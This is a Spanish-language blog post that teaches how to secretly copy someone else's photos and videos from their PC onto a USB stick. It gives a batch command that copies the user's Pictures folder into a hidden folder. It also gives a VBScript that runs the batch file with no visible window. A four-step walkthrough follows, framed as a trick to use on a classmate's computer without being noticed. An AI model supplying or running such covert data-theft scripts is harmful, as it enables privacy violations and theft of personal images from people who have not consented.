Cómo robar fotos y videos de una PC con USB sin ser descubiertos

Share:
Cómo robar fotos y videos con USB de una manera sencilla, sin problemas y eficiente. Si es lo que buscabas o simplemente lo haces por curiosidad llegaste al lugar indicado.

Si eres amante de la informática o simplemente eres un curioso buscando impresionar a tus amigos al mostrarles como extraes información con una pendrive desde sus ordenadores, pues te felicito estas en el lugar correcto para poder poner en asombro a tus compañeros mostrándoles este pequeño pero relevante truco de como poder extraer fotos y videos con una memoria USB sin ser descubiertos y así pues ganarte el alago y asombro de tus compañeros.


Hoy en día millones de memorias extraíbles son utilizadas a diario con un simple propósito: “guardar información de forma eficiente”. Pero hay otras muchas maneras de poder darle utilidad a una memoria USB, como por ejemplo poder extraer la contraseña de un ordenador o simplemente poder obtener fotos y videos sin preocuparnos que se den cuenta de que lo hayas hecho. Es por eso que a continuación te mostraremos en este nuevo post el cómo podrás extraer fotos y videos con una memoria USB de una forma eficiente y sin la preocupación de que el compañero de alado note ese desperfecto que ocurre con su ordenador.

Codigos a utilizar
  • copy C:\Users\%USERNAME%\Pictures\*.* .\ejemplo\ attrib +h ejemplo

  • Set WshShell = CreateObject("WScript.Shell") WshShell.Run chr(34) & "fuck.bat" & Chr(34), 0 Set WshShell = Nothing


Robar fotos y videos de una PC con USB sin ser descubiertos

Paso 1
Como primer paso es tener a la mano obviamente una memoria USB con la que realizaremos la extracción de fotos y videos de la PC, la insertaremos y creamos una carpeta (esta carpeta puede llevar cualquier nombre) y posteriormente crearemos un nuevo documento de texto con la extensión ".bat"  (ejemplo: fuck.bat) tal como se logra apreciar en la imagen.


Paso 2
Como segundo paso será editar el archivo de texto con la extensión ".bat" por lo cual daremos al documento (en mi caso es fuck.bat) clic derecho y editar, habiendo echo esto copiaremos el primer codigo que les deje arriba y lo pegaremos dentro del archivo de texto, posteriormente cerraremos el archivo de texto y le damos en guardar. La acción del código ocultara la carpeta que hayas creado así que no te asustes ya que puedes desocultarlo posteriormente.



Paso 3
Seguido de esto crearemos otro archivo de texto con la extensión ".vbs" (Este documento nos ocultara la acción que ejecuta la maquina cuando se le da enter al archivo con la extensión .bat) A este archivo le pondremos el nombre que nosotros queramos (ejemplo: ocultar.vbs) le daremos clic derecho al archivo y editar, copiaremos el segundo código que les deje arriba y lo pegaremos dentro del archivo creado, le daremos cerrar y lo guardaremos.



Paso 4


Finalmente estará listo para poder utilizarlo, lo único que tenemos que hacer será ocultar los archivos que en mi caso son la carpeta "ejemplo" y el documento con el nombre "fuck.bat". Finalmente solo resta insertar la memoria USB en la PC de otro usuario o bien puedes hacer la prueba con tu propio ordenador. Lo único que tienes que hacer es insertar la memoria y darle enter al documento que en mi caso es "ocultar.vbs" esto ejecutara la acción de copiar las fotos y videos que tenga la PC y lo estará pegando ocultamente en la carpeta que en este tutorial lo nombre "ejemplo" y asi de fácil y sencillo estaremos extrayendo las fotos y videos de otro ordenador sin ser descubiertos mediante una memoria de almacenamiento.

2 comentarios: